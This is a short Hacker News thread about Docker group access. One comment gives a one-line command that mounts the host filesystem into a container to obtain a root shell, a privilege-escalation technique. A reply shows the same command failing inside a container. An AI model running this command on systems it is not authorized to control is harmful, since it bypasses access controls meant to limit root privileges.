If `docker` is already there, why even bother with `sudo` when you can just: docker...

quectophoton • today at 11:21 AM • 1 reply • view on HN

If `docker` is already there, why even bother with `sudo` when you can just:

    docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'

Chances are that the person who set up Docker didn't do it properly.

Replies

sergeykish • today at 11:56 AM

Run in docker container:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
    /app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
    /bin/sh: docker: not found

I've described attack from host user and isolating attacker with docker.

alt Hacker News

Replies